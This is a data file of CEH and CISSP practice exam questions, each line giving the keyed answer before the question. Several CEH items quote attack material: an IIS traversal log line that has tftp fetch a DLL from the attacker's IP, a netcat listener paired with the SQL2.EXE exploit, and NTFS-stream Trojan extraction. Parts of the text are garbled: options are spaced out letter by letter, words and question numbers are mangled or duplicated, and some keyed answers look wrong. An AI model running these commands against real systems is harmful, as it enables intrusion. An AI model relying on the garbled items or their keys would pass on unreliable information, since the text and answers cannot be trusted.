A#CEH Q.57 Which of the following filter rules configured on a Linux system will block all outgoing ssh and telnet traffic to the hosts of the IP range 192.168.0.0 to 192.168.39.255? (Select the Best Answer)^A.	i p c h a i n s - A o u t p u t - p t c p - s a n y / 0 - d 1 9 2 . 1 6 8 . 0 . 0 / 1 9 2 2 : 2 3 - j D E N Y _ l                      ipchains -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l^B.	i p t a b l e s - A i n p u t - r I C M P - s a n y / 0 - d 1 9 2 . 1 6 8 . 0 . 0 / 1 9 2 3 : 2 2 - j D E N Y _                              li p t a b l e s - A o u t p u t - p t c p - s a n y / 0 - d 1 9 2 . 1 6 8 . 3 2 . 0 / 2 1 2 3 : 2 2 - j D E N Y _ l^C.	i p c o m m a n d - A o u t p u t - p t c p - s p e r m i t / 1 - d 1 9 2 . 1 6 8 . 0 . 0 / 1 9 2 2 : 2 3 - j A L L O W _             li p c o m m a n d - A o u t p u t - p t c p - s p e r m i t / 1 - d 1 9 2 . 1 6 8 . 3 2 . 0 / 2 1 2 2 : 2 3 - j A L L O W _ l^D.	i p f i l t e r - A o u t p u t - p t c p - s a n y / 0 - d 1 9 2 . 1 6 8. 0 . 0 / 1 9 2 2 : 2 3 - j D E N Y _ l                     ipfilter -A output -p tcp -s any/0 -d 192.168.32.0/21 22:23 -j DENY -l
C#CEH Q.58 From the following spam mail header, identify the host IP that sent this spam?^  Note: This question includes an HTML table which may not be accurately rendered^  From jie02@netvigator.com Tue Nov 27 17:27:11 2001^  Received: from viruswall.ie.cuhk.edu.hk (viruswall [137.189.96.52]) by eng.ie.cuhk.edu.hk (8.11.6/8.11.6) with ESMTP id fAR9RAP23061 for ; Tue, 27 Nov 2001 17:27:10 +0800 (HKT)^  Received: from mydomain.com (pcd249020.netvigator.com [203.218.39.20]) by viruswall.ie.cuhk.edu.hk (8.12.1/8.12.1) with SMTP id fAR9QXwZ018431 for ; Tue, 27 Nov 2001 17:26:36 +0800 (HKT)^  Message-Id: >200111270926.fAR9QXwZ018431@viruswall.ie.cuhk.edu.hk^  From: "china hotel web"^  To: "Shlam"^  Subject: SHANGHAI (HILTON HOTEL) PACKAGE^  Date: Tue, 27 Nov 2001 17:25:58 +0800 MIME-Version: 1.0^  X-Priority: 3 X-MSMail-^  Priority: Normal^  Reply-To: "china hotel web"^	(Select the Best Answer)^A.	137.189.96.52^B.	203.218.39.50^C.	203.218.39.20^D.	8.12.1.0
A#CEH Q.59 A httpd access_log file shows a WEB-IIS attack from a remote host^  04:47:14 137.68.238.15 GET /scripts/..%5c../winnt/system32/cmd.exe 404^  Which of the following will provide the organization (in full name) that owns the whole IP block of the remote host (i.e. 137.68.0.0 - 137.68.255.255)? (Select the Best Answer)^A.	#whois 137.68.238.15@whois.arin.net^B.	#arin 137.68.238.15^C.	# t u c o w s _ t 1 3 7 . 6 8 . 2 3 8 . 1 5^D.	#dlookup 137.68.238.15@name -l
D#CEH Q.60 Buffer overflow exploit can change the execution flow of a program because: (Select all that apply)^A.	it injects shell code in the stack^B.	it stuffs many 90 NOP code to the stack^C.	it stuffs too many data into local function variables^D.	it overwrites the return address of a call function in the stack
B,C,D#CEH Q.61 Which of the following techniques are used for insertion attack on IDS? (Select all that apply)^A.	Using IP Fragmentation^B.	Using Invalid sequence no.^C.	Using incorrect TCP checksum^D.	Using short TTL^E.	Using non-existent SYN packet flood
A#CEH Q.62 The following is tcpdump packets of an ARP poisoning Man-in-the-Middle (MITM) attack.^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:65 42: arp reply ntec9-28 is-at 0:50:56:47:0:61^  0:50:56:47:0:61 0:50:56:47:0:46 42: arp reply ntec1-28 is-at 0:50:56:47:0:61^  What is the MAC address of the middleman? (Select the Best Answer)^A.	0:50:56:47:0:61^B.	0:50:56:47:0:65^C.	0:50:56:47:0:46
C#CEH Q.63 John's department Web site has been hacked. He reviews the Web site logs and discovers the following log entries:^  34.5.67.4 is the IP address of the attacker:^  GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/ c+tftp%20-i%34.5.67.4%20GET%20Admin.dll%20c:\Admin.dll^  Which of the following worm is responsible for this attack? (Select the Best Answer)^A.	Mellisa^B.	SQL Slammer^C.	Nimda^D.	Code Red
C#CEH Q.64 Jack Hacker wants to break into Brown Co.'s computers and obtain their secret double fudge cookie recipe. ^  Jack calls Jane, an accountant at Brown Co., pretending to be an administrator from Brown Co. ^  Jack tells Jane that there has been a problem with some accounts and asks her to tell him her password ''just to double check our records.'' Jane believes that Jack is really an administrator, and tells him her password. Jack now has a user name and password, and can access Brown Co.'s computers, to find the cookie recipe.^  This is an example of what attack? (Select the Best Answer)^A.	Reverse Psychology^B.	Reverse Engineering^C.	Social Engineering^D.	Spoofing Identity^E.	Faking Identity
A#CEH Q.65 On October 7, 2001, NASA suffered massive attacks. Files were taken and employees' directories were invaded. ^  The intruders left methods to regain access to the system, called ''back doors,'' to allow them to reenter at any point in the future. ^  The attackers used a malicious program that disguises itself as a Word document and uses a flaw in the Word program for its attack. ^  Once the file is opened, it can steal log files and passwords. These are then sent back to the originator of the attack. ^  What worm was used for this attack? (Select the Best Answer)^A.	Mellisa^B.	Pretty Park^C.	Goga^D.	W32:Klez
B#CEH Q.66 Which of the following correctly describes the IDS evasion tool fragrouter? (Select the Best Answer)^A.	Some IDS can only keep track of one host/port connection at a time. Flood the target port with non-existent SYN packet first so that these IDS ignore the real connection.^B.	IP Fragmentation. By sending out fragment packets out of order, some IDS assume the fragment packets arrive in order. They just reassemble the data as soon as the marked final fragment arrives. Sending out fragment packets out of order may fool the IDS.^C.	Sending overlapping fragment packets. There may be a gap between the IDS and end-point server handling overlapping fragment. If the IDS does not handle overlapping fragments in a manner consistent with the systems it watches, it may reassemble a completely different packet than an end system in receipt of the same fragments.^D.	An end-system can accept a packet that an IDS rejects. An IDS that mistakenly rejects such a packet misses its contents entirely.
B#CEH Q.67 What does the hacking tool WinSSLMiM used for? (Select the Best Answer)^A.	Kills SSL TCP Sessions.^B.	Used in Man-in-the-Middle attacks against SSL Connections.^C.	Generates fake SSL Certificates.^D.	Monitors Windows SSL Sessions.
A,B,C#CEH Q.68  The Microsoft SQL Server contains several serious vulnerabilities that allow remote attackers to obtain sensitive information, alter database content, compromise SQL servers, and, in some configurations, compromise server hosts. ^  The SQL Server Resolution Service operates on UDP port 1434, provides a way for clients to query the appropriate network endpoints to use for a particular SQL Server instance. By sending a carefully crafted packet to the Resolution Service, an attacker could compromise and take over the system. ^  The hacking tool SQL2.EXE is used to launch this attack.^  C:\<nc -l -p 53^  C:\<SQL2.EXE db.target.com 202.202.202.202 53^  Which Microsoft SQL Server 2000 service packs are vulnerable to this exploit? (Select all that apply)^A.	SP0^B.	SP1^C.	SP2^D.	SP3
C#CEH Q.69 Which of the following is a backdoor Dynamic Link Library (DLL) Trojan that is used to attack and exploit IIS servers? If the attack is successful, then the attacker will have gained System level access to the server. ^  The Trojan DLL needs to be installed in the 'Scripts' directory of the IIS 5.0 machine in order for the exploit to be used. Browsing to the DLL (eg. http://IIS-server/enables the  Hacker to spawn commands remotely (using CM^D.EXE). (Select the Best Answer)^A.	IISExploit^B.	Jill-32.dll^C.	IISCrack.dll^D.	IPPExploit.dll
B#CEH Q.70 Which of the following Windows Hacking tool is used to hijack Telnet and FTP sessions? (Select the Best Answer)^A.	Hunt^B.	Juggernaut^C.	TTYWatcher^D.	T-Sight
C#CEH Q.71 Take a look at the following code:^  c:\< wtk -p 80 -i 192.168.0.1^  What does the hacking tool WTK do? (Select the Best Answer)^A.	It is a TCP connection killer for Windows 2000.^B.	It is a Windows Trojan Kit (wtk) program that connects to the daemon at 192.168.0.1 using port 80.^C.	It is a Windows Tunneling Kit (wtk) that establishes covert channels to 192.168.0.1 using port 80.^D.	This is a Linux command, which lists services and threads running on 192.168.0.1 at port 80.
c#CEH Q.74 What is the IP address of _rootkit_'s embedded TCP/IP stack? (Select the Best Answer)^A.	192.168.0.78^B.	172.8.0.1^C.	10.0.0.166^D.	204.187.7.99
C#CEH Q.75 You have successfully compromised MommaCookie's computer at MommaCookie.com domain. You have escalated your privileges to the level of an Administrator and planted a virus. You would like to cover your tracks by selectively erasing operating system log entries. Which tool will you use? (Select the Best Answer)^A.	Auditpol.exe^B.	Elslave.exe^C.	WinZapper^D.	Evidence Eliminator
D#CEH Q.76 Which of the following is a steganographic program that is used to conceal messages in ASCII text by appending whitespace to the end of lines in a text file? (Select the Best Answer)^A.	Camera/Shy^B.	ImageHide^C.	WhiteSpacer^D.	Snow
B#CEH Q.77 What is a Restorator? (Select the Best Answer)^A.	Restorator is a hacking tool which records keystrokes on a victim's computer.^B.	Restorator is a hacking tool which allows you to modify the user interface of any Win32 program by creating your own UCA's.^C.	Restorator is an advanced EXE wrapper for Windows 2K, which is used for SFX-archiving and secretly installing and running programs.^D.	It is a BackOrifice plug-in tool which extends BO2K functionality.
D#CEH Q.78 Which of the following is an ARP spoofing tool that is part of dsniff? (Select the Best Answer)^A.	Webspy^B.	URLSnarf^C.	Arpsniff^D.	Macof
B#CEH Q.79 Which of the following is a MAC address modifying utility which allows users to change MAC address for almost any Network Interface Cards (NIC) on the Windows 2000 and XP systems? (Select the Best Answer)^A.	Macof^B.	Smac^C.	Mac Changer^D.	Arpper
B#CEH Q.80 Take a look at the following code:^  c : \ < w d s _ n w w w . m i k e g o l d s . c o m _ I 4 . 6 . 7 . 8 _ g 0 0 - 0 0 - 3 9 - 5 c - 4 5 - 3 b^  What does the hacking tool wds do? (Select the Best Answer)^A.	It retrieves DNS records from ARIN database for the domain www.mikegolds.com^B.	It spoofs DNS domain name www.mikegolds.com to the IP address 4.6.7.8^C.	It poisons the MAC address located at 4.6.7.8 with 00-00-39-5c-45-3b^D.	It hijacks TCP sessions originating from www.mikegolds.com to the attackers machine located at 4.6.7.8
C#CEH Q.81 Which of the following is a Linux based sniffer detection tool? (Select the Best Answer)^A.	WinSniffer^B.	SniffDet^C.	Ethereal^D.	Ettercap
D#CEH Q.82 You launch Nmap targeting the domain http://www.furnituremill.com.^  Port 		State 		Service^  21/tcp 		open 		ftp^  80/tcp 		open 		http^  135/tcp 		open 		loc-srv^  139/tcp 		open 		netbios-ssn^  443/tcp 		open 		https^  1031/tcp 	open 		iads^  From the above output, you notice that port 139 is open. What hacking tool will you use to download list of shares and usernames from the domain http://www.furnituremill.com assuming you can connect through null sessions? (Select the Best Answer)^A.	SMBRelay^B.	SMBDump^C.	User2Sid^D.	DumpSec
B#CEH Q.84 Which of the following tool will you use to bypass a firewall that blocks all ports except ICMP?(Select all that apply)^A.	HTTP Reverse Shell^B.	Loki^C.	HTTP Tunnel^D.	007Shell
B#CEH Q.85 How long will it take to crack RSA 40 bits key using a single Pentium 4 (2.4 GHZ computer) using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years 
C#CEH Q.86 How long will it take to crack RSA 56 bits key using a single Pentium 4 (2.4 GHZ computer) using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years 
E#CEH Q.87 How long will it take to crack RSA 128 bits key using a single Pentium 4 (2.4 GHZ computer) using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years 
A,B,D,E#CEH Q.86  Buffer Overflow Vulnerabilities are due to applications that do not perform bound checks in the code. Which of the following C/C++ functions do not perform bound checks? (Select all that apply)^A.	gets()^B.	memcpy()^C.	strcpr()^D.	scanf()^E.	strcat()
D#CEH Q.88 How long will it take to crack RSA 64 bits key using a single Pentium 4 2.4 GHZ computer using brute-force attack? (Select the Best Answer)^A.	1.4 seconds^B.	1.4 minutes^C.	73 days^D.	50 years^E.	10 power 20 years
C#CEH Q.89 You have hidden a Trojan file virus.exe inside an abc.txt file using NTFS streaming. Which command would you execute to extract the Trojan to a standalone file? (Select the Best Answer)^A.	c:\> type abc.txt:virus.exe > virus.exe^B.	c:\> more abc.txt|virus.exe > virus.exe^C.	c:\> cat abc.txt:virus.exe > virus.exe^D.	c:\> list abc.txt$virus.exe > virus.exe
D#CISSP1 Q.1: In a discretionary mode, which of the following entities is authorized to grant information access to other people?	^A: Manager	^B: Group leader	^C: Security manager	^D: User
C#CISSP1 Q.2: Which DES mode of operation is best suited for database encryption?	^A: Cipher Block Chaining (CBC) mode	^B: Cycling Redundancy Checking (CRC) mode	^C: Electronic Code Book (ECB) mode	^D: Cipher Feedback (CFB) mode
B#CISSP1 Q.3: Within the realm of IT security, which of the following combinations best defines risk?	^A: Threat coupled with a breach.	^B: Threat coupled with a vulnerability.	^C: Vulnerability coupled with an attack.	^D: Threat coupled with a breach of security.
B#CISSP1 Q.4: Which of the following would be the best reason for separating the test and development environments?	^A: To restrict access to systems under test.	^B: To control the stability of the test environment.	^C: To segregate user and development staff.	^D: To secure access to systems under development.
A#CISSP1 Q.5: Which of the following statements pertaining to dealing with the media after a disaster occurred and disturbed the organizations activities is incorrect?	^A: The CEO should always be the spokesperson for the company during a disaster.	^B: The disaster recover plan must include how the media is to be handled during the disaster.	^C: The organization's spokesperson should report bad news before the press gets a hold of it through another channel.	^D: An emergency press conference site should be planned ahead.
B#CISSP1 Q.6: Which Orange book security rating introduces security labels?	^A: C2	^B: B1	^C: B2	^D: B3
A#CISSP1 Q.7: A Business Impact Analysis (BIA) does not:	^A: Recommend the appropriate recovery solution.	^B: Determine critical and necessary business functions and their resource dependencies.	^C: Identify critical computer applications and the associated outage tolerance.	^D: Estimate the financial impact of a disruption.
A#CISSP1 Q.8: Which access control model enables the owner of the resource to specify what subjects can accesss specific resources?	^A: Discretionary Access Control	^B: Mandatory Access Control	^C: Sensitive Access Control	^D: Role -based Access Control
C#CISSP1 Q.9: What type of cable is used with 100Base-TX Fast Ethernet?	^A: Fiber-optic cable	^B: Four pairs of Category 3, 4 or 5 unshielded twisted-par (UTP) wires.	^C: Two pairs of Category 5 unshielded twisted-pair (UTP) or Category 1 shielded twisted-pair (STP) wires.	^D: RG.58 cable.
B#CISSP1 Q.10: Which of the following best describes the Secure Electronic Transaction (SET) protocol?	^A: Originated by VISA and MasterCard as an Internet credit card protocol.	^B: Originated by VISA and MasterCard as an Internet credit card protocol using digital signatures.	^C: Originated by VISA and MasterCard as an Internet credit card protocol using the transport layer.	^D: Originated by VISA and MasterCard as an Internet credit card protocol using SSL.
D#CISSP1 Q.11: At which of the following phases of a software development life cycle are security and access controls	^A: Coding	^B: Product design	^C: Software plans and requirements	^D: Detailed design
C#CISSP1 Q.12: Which type of control would password management classify as?	^A: Compensating control	^B: Detective control	^C: Preventive control	^D: Technical control
C#CISSP1 Q.13: Due are is not related to:	^A: Good faith	^B: Prudent man	^C: Profit	^D: Best interest
D#CISSP1 Q.14: Which of the following is not an Orange Book-defined life cycle assurance requirement?	^A: Security testing	^B: Design specification and testing	^C: Trusted distribution	^D: System integrity
A#CISSP1 Q.15: What is another name for the Orange Book?	^A: The Trusted Computer System Evaluation Criteria (TCSEC)	^B: The Trusted Computing Base (TCB)	^C: The Information Technology Security Evaluation Criteria (ITSEC)	^D: The Common Criteria
C#CISSP1 Q.16: A password that is the same for each log-on session is called a?	^A:one-time password	^B:two-time password	^C: static password	^D: dynamic password
C#CISSP1 Q.17: Which of the following backup methods is most appropriate for off-site archiving?	^A: Incremental backup method.	^B: Off-site backup method.	^C: Full backup method.	^D: Differential backup method.
C#CISSP1 Q.18: Which of the following is not a weakness of symmetric cryptography?	^A: Limited security	^B: Key distribution	^C: Speed	^D: Scalability
B#CISSP1 Q.19: Which of the following is not a defined layer in the TCP/IP protocol model?	^A: Application layer	^B: Session layer	^C: Internet layer	^D: Network access layer
A#CISSP1 Q.20: Rewritable and erasable (CDR/W) optical disk are sometimes used for backups that require short time storage for changeable data, but require?	^A: Faster file access than tape.	^B: Slower file access than tape.	^C: Slower file access than drive.	^D: Slower file access than scale.
B#CISSP1 Q.21: Which one of the following is not a primary component or aspect of firewall systems?	^A: Protocol filtering	^B: Packet switching	^C: Rule enforcement engine	^D: Extended logging capability
C#CISSP1 Q.22: What are database views used for?	^A: To ensure referential integrity.	^B: To allow easier access to data in a database.	^C: To restrict user access to data in a database.	^D: To provide audit trails.
B#CISSP1 Q.23: Which of the following Common Data Network Services is used to send and receive email internally or externally through an email gateway device?	^A: File services	^B: Mail services	^C: Print services	^D: Client/Server services
D#CISSP1 Q.24: Intrusion detection has which of the following sets of characteristics.	^A: It is adaptive rather than preventive.	^B: It is administrative rather than preventive.	^C: It is disruptive rather than preventative.	^D: It is detective rather than preventative.
A#CISSP1 Q.25: Which type of password provides maximum security because a new password is required for each now log-on is defined to as?	^A: One-time or dynamic password	^B: Cognitive password	^C: Static password	^D: Pass phrase
B#CISSP1 Q.26: They in form of credit card-size memory cards or smart cards, or those resembling small calculators, are used to supply static and dynamic passwords are called?	^A: Token Ring	^B: Tokens	^C: Token passing networks	^D: Coupons
A#CISSP1 Q.27: Which of the following uses a directed graph to specify the rights that a subject can transfer to an object, or that a subject can take from another subject?	^A: Take-Grant model	^B: Access Matrix model	^C: Biba model	^D: Bell-Lapadula model
D#CISSP1 Q.28: Which of the following is the BEST way to prevent software license violations?	^A: Implementing a corporate policy on copyright infringements and software use.	^B: Requiring that all PCs be diskless workstations.	^C: Installing metering software on the LAN so applications can be accessed through the metered software.	^D: Regularly scanning used PCs to ensure that unauthorized copies of software have not been loaded on the PC.
A#CISSP1 Q.29: Zip/Jaz drives, SyQuest, and Bemoulli boxes are very transportable and are often the standard for?	^A: Data exchange in many businesses.	^B: Data change in many businesses.	^C: Data compression in many businesses.	^D: Data interchange in many businesses.
D#CISSP1 Q.30: What are two types of system assurance?	^A: Operational Assurance and Architecture Assurance.	^B: Design Assurance and Implementation Assurance.	^C: Architecture Assurance and Implementation Assurance.	^D: Operational Assurance and Life-Cycle Assurance.
A#CISSP1 Q.31: Why does compiled code pose more risk than interpreted code? ^A: Because malicious code can be embedded in the compiled code and can be difficult to detect.	^B: Because the browser can safely execute all interpreted applets.	^C: Because compilers are not reliable.	^D: It does not. Interpreted code poses more risk than compiled code.
C#CISSP1 Q.32: Which model, based on the premise that the quality of a software product is a direct function of the quality of its associated software development and maintenance processes, introduced five levels with which the maturity of an organization involved in the software process is evaluated? 	^A: The Total Quality Model (TQM)	^B: The IDEAL Model	^C: The Software Capability Maturity Model	^D: The Spiral Model
A#CISSP1 Q.33: Phreakers are hackers who specialize in telephone frau^D: What type of telephone fraud simulates the tones of coins being deposited into a payphone? 	^A: Red Boxes	^B: Blue Boxes	^C: White Boxes	^D: Black Boxes
C#CISSP1 Q.34: What is the proper term to refer to a single unit of Ethernet data? 	^A: Ethernet segment	^B: Ethernet datagram	^C: Ethernet frame	^D: Ethernet packet	
A#CISSP1 Q.35: Which of the following represents an ALE calculation? 	^A: Singe loss expectancy x annualized rate of occurrence.	^B: Gross loss expectancy x loss frequency.	^C: Actual repla cement cost - proceeds of salvage.	^D: Asset value x loss expectancy.
A#CISSP1 Q.36: IF an operating system permits executable objects to be used simultaneously by multiple users without a refresh of the objects, what security problem is most likely to exist? 	^A: Disclosure of residual data.	^B: Unauthorized obtaining of a privileged execution state.	^C: Data leakage through covert channels.	^D: Denial of service through a deadly embrace.
A#CISSP1 Q.37: Tape arrays use a large device with multiple (sometimes 32 or 64) tapes that are configured as a? 	^A: Single array	^B: Dual array	^C: Triple array	^D: Quadruple array
D#CISSP1 Q.38: Why would anomaly detection IDSs often generate a large number of false positives? 	^A: Because they can only identify correctly attacks they already know about.	^B: Because they are application-based are more subject to attacks.	^C: Because they cant identify abnormal behavior.	^D: Because normal patterns of user and system behavior can vary wildly.
C#CISSP1 Q.39: According to private sector data classification levels, how would salary levels and medical information be classified? 	^A: Public	^B: Sensitive	^C: Private	^D: Confidential
B#CISSP1 Q.40: Which of the following is used in database information security to hide information? 	^A: Inheritance	^B: Polyinstantiation	^C: Polymorphism	^D: Delegation
A#CISSP1 Q.41: Which of the following evaluates the product against the specification? 	^A: Verification	^B: Validation	^C: Concurrence	^D: Accuracy
D#CISSP1 Q.42: Application Level Firewalls are commonly a host computer running proxy server software, which makes a? 	^A: Proxy Client	^B: Proxy Session	^C: Proxy System	^D: Proxy Server
B#CISSP1 Q.43: What attack involves the perpetrator sending spoofed packet(s) with the SYN flag set to the victim's machine on any open port that is listening? 	^A: Bonk attack	^B: Land attack	^C: Teardrop attack	^D: Smurf attack
A#CISSP1 Q.44: The beginning and the end of each transfer during asynchronous communication data transfer are marked by? 	^A: Start and Stop bits.	^B: Start and End bits.	^C: Begin and Stop bits.	^D: Start and Finish bits.
A#CISSP1 Q.45: Most of unplanned downtime of information systems is attributed to which of the following? 	^A: Hardware failure	^B: Natural disaster	^C: Human error	^D: Software failure
A#CISSP1 Q.46: Raid that functions as part of the operating system on the file server 	^A: Software implementation	^B: Hardware implementation	^C: Network implementation	^D: Netware implementation
C#CISSP1 Q.47: During which phase of an IT system life cycle are security requirements developed? 	^A: Operation	^B: Initiation	^C: Development	^D: Implementation
B#CISSP1 Q.48: Ensuring that printed reports reach proper users and that receipts are signed before releasing sensitive documents are examples of? 	^A: Deterrent controls	^B: Output controls	^C: Information flow controls	^D: Asset controls
B#CISSP1 Q.49: Non-Discretionary Access Control. A central authority determines what subjects can have access to certain objects based on the organizational security policy. The access controls may be based on? 	^A: The societies role in the organization.	^B: The individual's role in the organization.	^C: The group-dynamics as they relate to the individual's role in the organization.	^D: The group-dynamics as they relate to the master-slave role in the organization.
B#CISSP1 Q.50: An effective information security policy should not have which of the following characteristics? 	^A: Include separation of duties.	^B: Be designed with a short-to mid-term focus.	^C: Be understandable and supported by all stakeholders.	^D: Specify areas of responsibility and authority.
B#CISSP1 Q.51: Which of the following statements pertaining to secure information processing facilities is incorrect? 	^A: Walls should have an acceptable fire rating.	^B: Windows should be protected by bars.	^C: Doors must resist forcible entry.	^D: Location and type of fire suppression systems should be known.
D#CISSP1 Q.52: Making sure that the data is accessible when and where it is needed is which of the following? 	^A: Confidentiality	^B: Integrity	^C: Acceptability	^D: Availability
B#CISSP1 Q.53: Business continuity plan development depends most on? 	^A: Directives of Senior Management	^B: Business Impact Analysis (BIA)	^C: Scope and Plan Initiation	^D: Skills of BCP committee
D#CISSP1 Q.54: Which layer defines the X.25, V.35, X,21 and HSSI standard interfaces?	^A: Transport layer	^B: Network layer	^C: Data link layer	^D: Physical layer
D#CISSP1 Q.55: Related to information security, availability is the opposite of which of the following? 	^A: Delegation	^B: Distribution	^C: Documentation	^D: Destruction
A#CISSP1 Q.56: Which of the following is a disadvantage of a behavior-based ID system? 	^A: The activity and behavior of the users while in the networked system may not be static enough to effectively implement a behavior-based ID system.	^B: The activity and behavior of the users while in the networked system may be dynamic enough to effectively implement a behavior-based ID system.	^C: The activity and behavior of the users while in the networked system may not be dynamic enough to effectively implement a behavior-based ID system.	^D: The system is characterized by high false negative rates where intrusions are missed.
C#CISSP1 Q.57: Which of the following statements pertaining to VPN protocol standards is false? 	^A: L2TP is a combination of PPTP and L2F.	^B: L2TP and PPTP were designed for single point-to-point client to server communication.	^C: L2TP operates at the network layer.	^D: PPTP uses native PPP authentication and encryption services.
C#CISSP1 Q.58: What is the most critical characteristic of a biometric identifying system? 	^A: Perceived intrusiveness	^B: Storage requirements	^C: Accuracy	^D: Reliability
A#CISSP1 Q.59: RAID Software can run faster in the operating system because neither use the hardware -level parity drives by? 	^A: Simple striping or mirroring.	^B: Hard striping or mirroring.	^C: Simple hamming code parity or mirroring.	^D: Simple striping or hamming code parity.
A#CISSP1 Q.60: The guarantee that the message sent is the message received, and that the message was not intentionally or unintentionally altered is? 	^A: Integrity	^B: Confidentiality	^C: Availability	^D: Identity
B#CISSP1 Q.61: Which of the following is a preventive control? 	^A: Motion detectors	^B: Guard dogs	^C: Audit logs	^D: Intrusion detection systems
B#CISSP1 Q.62: What uses a key of the same length as the message? 	^A: Running key cipher	^B: One-time pad	^C: Steganography	^D: Cipher block chaining
A#CISSP1 Q.63: Which of the following protocols operates at the session layer (layer 5)? 	^A: RPC	^B: IGMP	^C: LDP	^D: SPX
B#CISSP1 Q.64: Which of the following are NOT a countermeasure to traffic analysis? 	^A: Padding messages	^B: Eavesdropping	^C: Sending noise	^D: Covert channel analysis
C#CISSP1 Q.65: Which of the following layers of the ISO/OSI model do packet filtering firewalls operate at?	^A: Application layer	^B: Session layer	^C: Network layer	^D: Presentation layer
C#CISSP1 Q.66: A prolonged high voltage is? 	^A: Spike	^B: Blackout	^C: Surge	^D: Fault
D#CISSP1 Q.67: How do the Information Labels of Compartmented Mode Workstation differ from the Sensitivity Levels of B3 evaluated systems? 	^A: Information Labels in CMW are homologous to Sensitivity Labels, but a different term was chosen to emphasize that CMW's are not described in the Orange Book.	^B: Information La bels contain more information than Sensitivity Labels, thus allowing more granular access decisions to be made.	^C: Sensitivity Labels contain more information than Information Labels because B3+ systems should store more sensitive data than workstations.	^D: Information Labels contain more information than Sensitivity Labels, but are not used by the Reference Monitor to determine access permissions.
A#CISSP1 Q.68: In what security mode can a system be operating if all users have the clearance or authorization and need-to-know to all data processed within the system? 	^A: Dedicated security mode.	^B: System-high security mode.	^C: Compartmented security mode.	^D: Multilevel security mode.
D#CISSP1 Q.69: What are the three conditions that must be met by the reference monitor?	^A: Confidentiality, availability and integrity.	^B: Policy, mechanism and assurance.	^C: Isolation, layering and abstraction.	^D: Isolation, completeness and verifiability.
B#CISSP1 Q.70: While referring to Physical Security, what does Positive pressurization means? 	^A: The pressure inside your sprinkler system is greater than zero.	^B: The air goes out of a room when a door is opened and outside air does not go into the room.	^C: Causes the sprinkler system to go off.	^D: A series of measures that increase pressure on employees in order to make them more productive.
C#CISSP1 Q.71: The baseline sets certain thresholds for specific errors or mistakes allowed and the amount of these occurrences that can take place before it is considered suspicious? 	^A: Checkpoint level	^B: Ceiling level	^C: Clipping level	^D: Threshold level
B#CISSP1 Q.72: The most prevalent cause of computer center fires is which of the following? 	^A: AC equipment	^B: Electric al distribution systems.	^C: Heating systems	^D: Natural causes
C#CISSP1 Q.73: An offsite backup facility intended to operate an information processing facility, having no computer or communications equipment, but having flooring, electrical writing, air conditioning, et^C: Is better known as a? 	^A: Hot site	^B: Duplicate processing facility	^C: Cold site	^D: Warm site
C#CISSP1 Q.74: Which of the following are necessary components of a Multi-Level Security Policy? 	^A: Sensitivity Labels and a ""system high"" evaluation."	^B: Sensitivity Labels and Discretionary Access Control.	^C: Sensitivity Labels and Mandatory Access Control.	^D: Object Labels and a ""system high"" evaluation."
A#CISSP1 Q.75: Which of the following, used to extend a network, has a storage capacity to store frames and act as a store -and-forward device? 	^A: Bridge	^B: Router	^C: Repeater	^D: Gateway
D#CISSP1 Q.76: Which of the following is addressed by Kerberos? 	^A: Confidentiality and integrity.	^B: Authorization and authentication.	^C: Validation and integrity.	^D: Confidentiality and integrity.
A#CISSP1 Q.77: Access Control techniques do not include which of the following choices? 	^A: Relevant Access Controls	^B: Discretionary Access Control	^C: Mandatory Access Control	^D: Lattice Based Access Control
D#CISSP1 Q.78: Why is public key cryptography recommended for use in the process of securing facsimiles during transmission? 	^A: Keys are never transmitted over the network.	^B: Data compression decreases key change frequency.	^C: Key data is not recognizable from facsimile data.	^D: The key is securely passed to the receiving machine.
A#CISSP1 Q.79: Database views are not used to:	^A: Implement referential integrity.	^B: Implement least privilege.	^C: To implement content-dependent access restrictions.	^D: Implement need-to-know.
B#CISSP1 Q.80: Which of the following is most concerned with personnel security? 	^A: Management controls	^B: Operational controls	^C: Technical controls	^D: Human resources controls.
A#CISSP1 Q.81: Which of the following statements pertaining to the Trusted Computer System Evaluation Criteria (TCSEC) is incorrect? 	^A: With TCSEC, functionality and assurance are evaluated separately.	^B: TCSEC provides a means to evaluate the trustworthiness of an information system.	^C: The Orange book does not cover networks and communications.	^D: Data base management systems are not covered by the TCSEC.
B#CISSP1 Q.82: Which of the following could illegally capture network user passwords? 	^A: Data diddling	^B: Sniffing	^C: Spoofing	^D: Smurfing
A#CISSP1 Q.83: Which trusted facility management concept implies that two operators must review and approve the work of each other? 	^A: Two-man control	^B: Dual control	^C: Double control	^D: Segregation control
B#CISSP1 Q.84: There are more than 20 books in the Rainbow Series. Which of the following covers password management guidelines? 	^A: Orange Book	^B: Green Book	^C: Red Book	^D: Lavender Book
D#CISSP1 Q.85: Which of the following is an ip address that is private? (i.e. reserved for internal networks, and not a valid address to use on the Internet)? 	^A: 172.5.42.5	^B: 172.76.42.5	^C: 172.90.42.5	^D: 172.16.42.5
C#CISSP1 Q.86: How fast is private key cryptography compared to public key cryptography? 	^A: 10 to 100 times faster.	^B: 100 to 1000 times faster.	^C: 1000 to 10000 times faster.	^D: 10000 to 20000 times faster.
C#CISSP1 Q.87: The continual effort of making sure that the correct policies, procedures and standards are in place and being followed is described as what? 	^A: Due care	^B: Due concern	^C: Due diligence	^D: Due practice
A#CISSP1 Q.88: Which tape format type is mostly used for home/small office backups? 	^A: Quarter Inch Cartridge drives (QIC)	^B: Digital Linear Tapes (DLT)	^C: 8mm tape	^D: Digital Audio Tape (DAT)
